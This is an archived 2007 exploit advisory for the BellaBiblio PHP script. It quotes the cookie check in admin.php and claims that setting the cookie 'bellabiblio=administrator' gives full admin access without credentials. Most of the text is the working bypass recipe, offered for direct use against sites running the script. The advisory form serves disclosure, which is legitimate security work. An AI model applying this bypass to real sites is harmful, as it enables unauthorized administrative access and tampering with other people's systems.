Home / os / solaris

bellabiblio-bypass.txt

Posted on 31 July 2007

BellaBiblio Admin Login Bypass SCRIPT: BellaBiblio DOWNLOAD: http://www.jemjabella.co.uk/scripts/BellaBiblio.zip AUTHOR: ilker kandemir <ilkerkandemir[at]mynet.com> Bug in;(admin.php) if (isset($_COOKIE['bellabiblio'])) { if ($_COOKIE['bellabiblio'] == md5($admin_name.$admin_pass.$secret)) { if (isset($_GET['ap'])) $page = $_GET['ap']; else $page = ""; EXPLOIT: Set your cookie: bellabiblio=administrator http:/site.com/admin.php And you have full admin access

 

TOP